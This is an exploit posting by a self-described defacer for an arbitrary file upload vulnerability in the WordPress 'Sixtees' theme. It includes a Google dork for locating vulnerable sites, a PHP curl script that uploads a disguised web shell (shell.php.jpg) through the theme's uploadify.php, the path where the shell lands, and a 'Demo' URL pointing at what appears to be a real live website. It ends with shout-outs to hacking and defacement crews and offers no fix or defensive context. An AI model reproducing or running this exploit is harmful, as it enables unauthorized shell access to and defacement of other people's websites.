Wordpress Themes- Sixtees Arbitrary File Upload Vulnerability
######################################################################################
#
# Author : eX-Sh1Ne
#
# Facebook : www.fb.me/ShiNe.gov
#
# Google Dork => inurl:"wp-content/themes/sixtees"
#
#######################################################################################
---------------------------------------------------------------------------------------
Exploit : shell.php.jpg or .gif
<?php
$uploadfile="sh1ne.php.jpg";
$ch = curl_init("http://127.0.0.1/wp-content/themes/sixtees/sprites/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
-------------------------------------------------------------------------------------
Shell Access : http://www.localhost/wp-content/themes/sixtees/sprites/js/cufon-fonts/uploaded/custom_sh1ne.php.jpg
---------------------------------------------------------------------------------------
Demo :
http://www.sixteespromotions.com/wp-content/themes/Sixtees/sprites/js/uploadify/uploadify.php
---------------------------------------------------------------------------------------
sh00tz :
[+] Java Defacer Team - IDCA Team - No-Name Crew - IL-c0de - Bandung Blackhat
[+] Admin07 - Freezer22 - Pr0blemNymouz - Black Style - FH04ZA - MS06-87 - hantu_j4va - Antonio HsH - Taqiyya
[+] Mr.Xenophobic - Deflectoz - DeYuBi-Cyber - Mbah_Dukun - Mr./AryeaKoplaxz404 - Sanja07 - ice-cream - p0zh1e - K4C3 Undetected
[ NOTE ]
[+] Tetap Mencoba dan Terus Mencoba
\!/ INDONESIAN PEOPLE HERE \!/